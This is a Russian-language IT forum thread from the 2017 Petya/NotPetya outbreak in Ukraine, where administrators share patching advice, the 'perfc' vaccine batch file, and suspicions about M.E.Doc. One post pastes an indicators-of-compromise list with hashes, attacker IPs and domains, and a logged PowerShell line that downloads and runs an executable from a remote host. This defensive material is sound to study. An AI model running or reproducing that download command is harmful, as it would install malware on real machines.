Virus #Petya. На Украину обрушилась масштабная хакерская атака. Хроника-онлайн.
Найденные решения
(1)
Этого должно быть достаточно для предотвращения заражения извне.
Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости .
Кто что может посоветовать?
Для начала - жестко вразумить все прокладки между стулом и монитором, чтобы не открывали писем с неизвестных (и даже вроде бы известных) адресов и не переходили по ссылкам в них, как бы заманчиво те не выглядели.
Этого должно быть достаточно для предотвращения заражения извне.
Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости .
Остальные ответы
Подписаться на ответы
Инфостарт бот
Сортировка:
Древо развёрнутое
Свернуть все
(1)
Этого должно быть достаточно для предотвращения заражения извне.
Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости .
Кто что может посоветовать?
Для начала - жестко вразумить все прокладки между стулом и монитором, чтобы не открывали писем с неизвестных (и даже вроде бы известных) адресов и не переходили по ссылкам в них, как бы заманчиво те не выглядели.
Этого должно быть достаточно для предотвращения заражения извне.
Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости .
(6) машина не поможет - филиалы по всей Украине. Сейчас найду в каждом филиале самого свирепого менеджера и напишу текст, которые нужно с выражением прочитать пользователям. После этого включим интернет снова и сделаю копии. Ничего умнее не придумала.
SMB у нас и так везде закрыто.
SMB у нас и так везде закрыто.
(3)
По-моему, как раз наоборот: если в Инет выставлен непропатченный сервер с незакрытыми соответствующими портами, то вирус может его заразить и без участия пользователей.
А уж от сервера огребут и все незащищенные юзеры.
только клиентские машины?
Вы смотрели материал по ссылке? Там только клиентские ОС?
По-моему, как раз наоборот: если в Инет выставлен непропатченный сервер с незакрытыми соответствующими портами, то вирус может его заразить и без участия пользователей.
А уж от сервера огребут и все незащищенные юзеры.
приведен (без указания источника) рецепт предотвращения срабатывания вируса в случае заражения:
Справедливости ради надо отметить, что расковыряли эту дырку в вирусе специалисты Symantec.
Ну, и особо стоит обратить внимание на оговорку про "новую версию" - наверняка в ней этот способ перестанет работать, поэтому без исполнения рекомендаций из (2) это просто заплатка для самоуспокоения.
До заражения создаете в папке C:\Windows пустой файл с именем "perfc" и ставите ему атрибут "Только чтение". Если вирус и попадет в систему, то он подумает, что она уже им заражена и не будет ничего делать. Во всяком случае, пока новую версию не выпустят.
Справедливости ради надо отметить, что расковыряли эту дырку в вирусе специалисты Symantec.
Ну, и особо стоит обратить внимание на оговорку про "новую версию" - наверняка в ней этот способ перестанет работать, поэтому без исполнения рекомендаций из (2) это просто заплатка для самоуспокоения.
(1) Вот что известно о вирусе на данный момент, вычитал в инете, копирую сюда
Маркеры компрометации:
File Name Order-20062017.doc (на самом деле RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6
File Size 6215 bytes
File Type Rich Text Format data
Инициирует соединение с хостом
84.200.16.242 80
h11p://84.200.16.242/myguy.xls (на самом деле HTA)
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe')
10807.exe %APPDATA%\10807.exe" " (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF
File Size 275968 bytes
Инициирует соединение с хостом
111.90.139.247 80
COFFEINOFFICE.XYZ 80
Рекомендации:
- - - - - - - - - - - -
1) проверить журналы систем на наличие данных маркеров компрометации
2) По возможности на сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP
3) Если заражение произошло ни в коем случае не допускать перезагрузки системы (cmd /k shutdown -a)
4) Системы, которые зашифрованы, не форматировать сразу, а снять образ диска (может потом появится какой-то ключ к расшифровке)
5) Блокировать запуск .exe в %AppData% та %Temp%
Маркеры компрометации:
File Name Order-20062017.doc (на самом деле RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6
File Size 6215 bytes
File Type Rich Text Format data
Инициирует соединение с хостом
84.200.16.242 80
h11p://84.200.16.242/myguy.xls (на самом деле HTA)
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe')
10807.exe %APPDATA%\10807.exe" " (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF
File Size 275968 bytes
Инициирует соединение с хостом
111.90.139.247 80
COFFEINOFFICE.XYZ 80
Рекомендации:
- - - - - - - - - - - -
1) проверить журналы систем на наличие данных маркеров компрометации
2) По возможности на сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP
3) Если заражение произошло ни в коем случае не допускать перезагрузки системы (cmd /k shutdown -a)
4) Системы, которые зашифрованы, не форматировать сразу, а снять образ диска (может потом появится какой-то ключ к расшифровке)
5) Блокировать запуск .exe в %AppData% та %Temp%
P P S у меня 100 % уверенность что заражение идет через медок так как идет через него обмен файлами накладными посредством интернета + спец медка настойчиво просят чтоб во всех антивирях медок был в исключениях
P P P S сча сам медок активно колбасит
P P P S сча сам медок активно колбасит
(16)
Потому что "изобретатели" не там, а где-то совсем в другом месте. Возможно, у Касперского. Или еще где-то. Причем, "изобретение" состоялось еще в апреле:
Тут и текст похож, и картинки те же самые (кто у кого скопипастил, как думаете?), но зато есть ссылки и действительно можно пробовать.
Осталось надеяться, что это тот же самый Petya, что не гарантируется - по идее, Касперский должен опознавать его еще с апреля.
Что-то изобрели.
Ага, "изобрели" - ни единой ссылки на чудо-утилиты.
Потому что "изобретатели" не там, а где-то совсем в другом месте. Возможно, у Касперского. Или еще где-то. Причем, "изобретение" состоялось еще в апреле:
Тут и текст похож, и картинки те же самые (кто у кого скопипастил, как думаете?), но зато есть ссылки и действительно можно пробовать.
Осталось надеяться, что это тот же самый Petya, что не гарантируется - по идее, Касперский должен опознавать его еще с апреля.
Вирусная атака на компьютеры госучреждений и компаний, расположенных на Украине, в России и странах Европы, началась с того, что «некоторые корпоративные пользователи» установили зараженную вирусом Petya.C программу для бухгалтерской отчетности M.E.Doc. Эта программа широко используется в украинских компаниях. К такому заключению пришли специалисты компании ESET, которая разрабатывает антивирусное программное обеспечение, говорится в поступившем в РБК пресс-релизе.
Подробнее на РБК:
Подробнее на РБК:
P S Как вариант - убираете в антивирусе Медок из исключений , проверяете компьютер - если антивирус распознал медок как вирус - звоните в тех поддержку Медка и записываете все то что скажут работники тех поддержки
Всем предприятиям которые пострадали в результате заражения вирусом - обязательно написать заявы в полицию о вирусной атаке ( дабы прикрыть свою попу в случае чего ) например за невовремя сданные отчет или налоговые накладные чтоб не было санкций ...
Батник с "вакциной".
Упомянутого твита уже нет. Проверка "net session" провалится, если не запущена служба "сервер".
Запускать от имени админа.
@echo off
REM Administrative check from here: stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights
REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224
REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams
echo Administrative permissions required. Detecting permissions...
echo.
net session >nul 2>&1
if %errorLevel% == 0 (
if exist C:\Windows\perfc (
echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
echo.
) else (
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat
attrib +R C:\Windows\perfc
attrib +R C:\Windows\perfc.dll
attrib +R C:\Windows\perfc.dat
echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
echo.
)
) else (
echo Failure: You must run this batch file as Administrator.
)
pause
ПоказатьЗапускать от имени админа.
Около 100 пользователей - вся почта через фильтр по исполняемым, содержимое архивов - также, не читаемые и запароленные архивы - сразу в топку, большинство пользователей с сильно урезанными правами (только работа). Ну и самое важное, периодически ликбез на тему серфинга - т.е. банальная компьютерная грамотность - не надо на автомате не задумываясь клацать на всплывающие сообщения
Не редко приходят письма - "судебное уведомление - откройте срочно", "к вам едет ревизор - прочтите срочно" и т.д. :)
За 3 года - 2 шифровальщика добирались до своей цели - итог - быстрое восстановление файлов пользователя (политика хранения информации - только в личной на сервере) и продолжение работы (биткоины нам и самим нужны :)))
Не редко приходят письма - "судебное уведомление - откройте срочно", "к вам едет ревизор - прочтите срочно" и т.д. :)
За 3 года - 2 шифровальщика добирались до своей цели - итог - быстрое восстановление файлов пользователя (политика хранения информации - только в личной на сервере) и продолжение работы (биткоины нам и самим нужны :)))
(46) Сервера медка изъяты на проверку. Проверяют как к ним внедрили бэкдор. При этом, если кто-то продолжает использовать медок сейчас, должны понимать, что файл ZvitPublishedObjects.dll инфицирован этим бэкдором. Этот бекдор через эту ддлку может передавать такие данные как ЕДРПОУ, адрес электронной почты и пароль от электронной почты, возможно пароли от электронных ключей, но не сами электронные ключи, вроде бы.
Для получения уведомлений об ответах подключите телеграм бот:
Инфостарт бот